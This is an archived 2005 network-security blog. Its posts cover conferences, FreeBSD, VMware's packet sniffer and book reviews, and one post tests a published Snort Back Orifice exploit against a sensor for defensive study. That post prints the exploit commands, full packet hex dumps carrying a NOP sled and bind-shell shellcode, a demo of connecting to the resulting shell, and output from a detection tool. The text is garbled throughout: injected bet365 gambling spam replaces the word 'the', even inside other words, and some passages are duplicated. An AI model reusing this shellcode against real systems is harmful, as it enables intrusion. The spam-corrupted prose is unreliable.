Monday, October 31, 2005
Bejtlich to Speak at ShmooCon 2006
I just learned I will speak at ShmooCon 2006 in Washington, DC on Saturday, 14 January 2006 at 1600. The subject is Network Security Monitoring with Sguil.
Friday, October 28, 2005
First Hampton Roads, VA Snort Users Group Meeting
My friend David Bianco is organizing a Hampton Roads, VA Snort Users Group. The first meeting will be 1 December 2005. Check out cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 story for more details!
FreeBSD 6.0-RELEASE Available Soon
According to this announcement by FreeBSD release engineer Scott Long, FreeBSD 6.0-RELEASE "will likely be announced by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 weekend or early next week, at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest." This is great news. I plan to upgrade all of my 5.4 systems to 6.0 when it is available. I'll post my experiences.
Thursday, October 27, 2005
New (IN)SECURE Magazine Features Bejtlich Article
The latest (IN)SECURE magazine was just published. Issue 1.4 features a 7-page article on Structured Traffic Analysis, a methodology to investigate network traces I developed for my Network Security Operations class.
It uses open source tools to perform zero-knowledge analysis of saved traffic. After reading this article, you may share cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sentiments of a student in one of my recent classes who said "I’m embarrassed I ever used Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365real to start network analysis!"
It uses open source tools to perform zero-knowledge analysis of saved traffic. After reading this article, you may share cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sentiments of a student in one of my recent classes who said "I’m embarrassed I ever used Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365real to start network analysis!"
Review of VMware Workstation 5 Handbook Posted
Amazon.com just posted my four star review of VMware Workstation 5 Handbook. From cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 review:"Steven S. Warren's VMware Workstation 5 Handbook (VW5H) is a great book for beginning and intermediate VMware Workstation (WS) users. It is well-written, thorough, and informative. Those who are trying to deploy WS for average home, research, or corporate purposes will find cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir needs met. Those looking for in-depth coverage exceeding VMware's online documentation will be disappointed. Still, I've been using VMware for almost 4 years, and I learned a few new tricks.
VMware's online documentation is excellent. Those seeking to install and operate WS will find most of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir needs met reading VMware's free guides. VW5H provides context and problem-solving techniques that one may not acquire from VMware's documentation. For example, a new user may be unaware of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 purpose of a product like VMware P2V Assistant. By reading Ch 15 of VW5H, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user will learn how P2V can create virtual machines out of physical systems."
VMware Workstation Vnetsniffer
Did you know VMware Workstation ships with a sniffer? I should have know about it before now. Lenny Zeltser mentioned it in his 2001 paper on reverse engineering malware. There's only 15 references in Google Groups, however.
Vnetsniffer is very limited with regard to reporting. Here is sample output:
This output doesn't even show TCP or UDP ports, which would be very helpful. Vnetsniffer seems best suited for basic troubleshooting of virtual switches, thanks to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ability to specify a vmnet to monitor. Here I chose vmnet0, which is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 default bridged interface. vmnet1 is used for host-only networking, and vmnet8 is used for NAT.
Vnetsniffer is very limited with regard to reporting. Here is sample output:
C:\Program Files\VMware\VMware Workstation>vnetsniffer
usage: vnetsniffer [/e] (/p "pvnID" | VMnet?)
C:\Program Files\VMware\VMware Workstation>runas /u:administrator "vnetsniffer /e vmnet0"
Enter password for administrator:
Attempting to start "vnetsniffer /e vmnet0" as user "administrator"...
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 60 src 00:13:10:65:2f:ab dst 00:03:47:0f:1f:3c ARP sender
00:13:10:65:2f:ab 192.168.2.1 target 00:00:00:00:00:00 192.168.2.4
ARP request
len 42 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab ARP sender
00:03:47:0f:1f:3c 192.168.2.4 target 00:13:10:65:2f:ab 192.168.2.1
ARP reply
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 435 src 00:13:10:65:2f:ab dst 00:03:47:0f:1f:3c IP src 208.185.174.52
dst 192.168.2.4 TCP
This output doesn't even show TCP or UDP ports, which would be very helpful. Vnetsniffer seems best suited for basic troubleshooting of virtual switches, thanks to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ability to specify a vmnet to monitor. Here I chose vmnet0, which is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 default bridged interface. vmnet1 is used for host-only networking, and vmnet8 is used for NAT.
Wednesday, October 26, 2005
Bejtlich Books in HNS Contest
Mirko Zorz from Help Net Security notified me that two of my books are up for grabs in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 HNS 7th Anniversary Book Contest. You could win Real Digital Forensics or Extrusion Detection: Security Monitoring for Internal Intrusions. The winners will be announced on Monday, 5 December 2005. Good luck!
Tuesday, October 25, 2005
Snort BO Exploit Published
As I expected, FrSIRT published an exploit for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4.
Here is what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 traffic looks like:
I ran this traffic by a local sensor running Snort 2.3.3 on FreeBSD 5.4 and it continued to function. There was no DoS or exploit. RD's exploit as written targets Linux. His demo exploits a 2.6 kernel:
Kyle Haugsness wrote a tool and rules to detect cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Snort BO exploit which you might find useful. By following cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 directions in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 code I got it to work on FreeBSD 5.4:
On a related note, I saw Tom Ptacek comment on my earlier post. Tom says:
"There is nothing wrong with looking for vulnerabilities in your competitor's products, and Neel Mehta has built enough of a rep for himself that he doesn't need to take 'marching orders' from anybody."
I agree cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is nothing wrong with looking for vulnerabilities in your competitor's products. However, are we supposed to believe that Neel Mehta, an ISS X-Force researcher, developed this exploit on his own? Are we supposed to think he did not do this at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 direction of his employer, who published an advisory? If Neel discovered this vulnerability on his own, and not while working for ISS, why did Sourcefire learn of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability from US-CERT and not Neel himself?
orr:/home/richard$ ./THCsnortbo 66.93.110.10 1
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org
Selected target:
1 | manual testing gcc with -O0
Sending exploit to 66.93.110.10
Done.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 2
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org
Selected target:
2 | manual testing gcc with -O2
Sending exploit to 66.93.110.10
Done.
Here is what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 traffic looks like:
09:30:36.134739 IP 192.168.2.5.56292 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0bdb 0000 4011 f669 c0a8 0205 E.......@..i....
0x0010: 425d 6e0a dbe4 0035 0580 9592 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf d45a 5a79 4d8a b466 aaa2 c875 .....ZZyM..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5ac8 4e7d dca6 c911 55e5 4ff1 ...;Z.N}....U.O.
0x0430: 9f83 5c16 8477 7529 d9b0 6336 e9aa 8210 ..\..wu)..c6....
0x0440: d5ef 789e 77bd 491c 2e92 e890 16bc d51e ..x.w.I.........
0x0450: f8fd 1e58 2446 23ee fa37 8841 3e90 9090 ...X$F#..7.A>...
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....
09:30:49.654205 IP 192.168.2.5.55465 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0be4 0000 4011 f660 c0a8 0205 E.......@..`....
0x0010: 425d 6e0a d8a9 0035 0580 8ec2 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf 1fa1 a586 4d8a b466 aaa2 c875 ........M..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5a1c edcf 5da6 c911 55e5 4ff1 ...;Z...]...U.O.
0x0430: 9f77 ffa4 0577 7529 d9b0 6336 e97e 21a2 .w...wu)..c6.~!.
0x0440: 54ef 789e 77bd 491c 2ef1 71b6 0f90 9090 T.x.w.I...q.....
0x0450: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....
I ran this traffic by a local sensor running Snort 2.3.3 on FreeBSD 5.4 and it continued to function. There was no DoS or exploit. RD's exploit as written targets Linux. His demo exploits a 2.6 kernel:
* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1
Kyle Haugsness wrote a tool and rules to detect cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Snort BO exploit which you might find useful. By following cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 directions in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 code I got it to work on FreeBSD 5.4:
orr:/home/richard$ gcc -Wall -lpcap -o ident-snort-bo-exploit ident-snort-bo-exploit.c
orr:/home/richard$ sudo ./ident-snort-bo-exploit
# Using interface: fxp0
# Using alert output file: stdout
# Using pcap output file: snort-bo-exploit-2005-10-25-09:46:54.cap
#
##############################################
#
# Detected exploit attempt! (details below)
# Note that shellcode should start after 9th
# byte into cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 payload below (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 8 byte
# magic value has been removed and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365
# remainder of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 header is 9 bytes).
#
##############################################
#
# Date/time: Tue Oct 25 09:47:21 2005
# Source IP: 192.168.2.5
# Dest IP: 66.93.110.10
# Source port: 64544
# Dest port: 53
# UDP data len: 1400
# BO key (dec): 31337
# BO key (hex): 0x7A69
# BO data len: -18 (UDP len - 17 byte BO header)
# BO pkt id: -1
# BO pkt type: 0x01 (0x01 = PING)
#
# Decrypted BO data:
#
0x0000: FF FF FF FF FF FF FF FF 01 90 90 90 90 90 90 90 ................
0x0010: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0x0020: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
...edited...
0x0550: 3D AA E7 D7 80 CA 0F 07 36 14 2A 0C 65 08 05 8C =.......6.*.e...
0x0560: EE 97 25 0C 0F 90 66 06 2B 5B E2 3C CE E9 14 4B ..%...f.+[.<...K
0x0570: 00 00 00 00 00 00 00 00 ........
#
# Decoded packet num: 1; Exploit: yes; Timestamp: Tue Oct 25 09:47:21 2005
On a related note, I saw Tom Ptacek comment on my earlier post. Tom says:
"There is nothing wrong with looking for vulnerabilities in your competitor's products, and Neel Mehta has built enough of a rep for himself that he doesn't need to take 'marching orders' from anybody."
I agree cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is nothing wrong with looking for vulnerabilities in your competitor's products. However, are we supposed to believe that Neel Mehta, an ISS X-Force researcher, developed this exploit on his own? Are we supposed to think he did not do this at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 direction of his employer, who published an advisory? If Neel discovered this vulnerability on his own, and not while working for ISS, why did Sourcefire learn of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability from US-CERT and not Neel himself?
Monday, October 24, 2005
Reviews of Computer Security 20 Things Every Employee Should Know, 2nd Ed, The Symantec Guide to Home Internet Security Posted
The drought has ended. Amazon.com just posted my two newest reviews. First was Computer Security 20 Things Every Employee Should Know, 2nd Ed by Ben Rothke. I gave it three stars, but I would give cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next edition higher ratings if Ben addresses my suggestions. From cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 review:Ben Rothke's Computer Security: 20 Things Every Employee Should Know, 2nd Ed, contains a great deal of sound advice for nontechnical employees. At least 10 tips could be eliminated by combining redundancies. I would reduce cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 list to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following topics:
(1) Beware malware, spyware, and phishing; (2) Protect your identity; (3) Protect cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 organization's data; (4) Choose sound passwords and protect cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m; (5) Use organization resources for authorized purposes; (6) Beware of social engineers; (7) Call cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 experts when things go wrong; (8) Protect laptops, PDAs, cell phones, and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r mobile devices as you would corporate resources.
I also reviewed The Symantec Guide to Home Internet Security by Andrew Conry-Murray and Vincent Weafer. I gave this book four stars. From cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 review:The Symantec Guide to Home Internet Security (TSGTHIS) is Symantec's latest offering in its new series of books published through Addison-Wesley. This is a very solid introductory desktop security book for home power users. This is not cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 book to give to your grandmocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r, unless she likes to tweak Windows or wants to understand differences between file infector and polymorphic viruses. With one caveat, I liked this book...
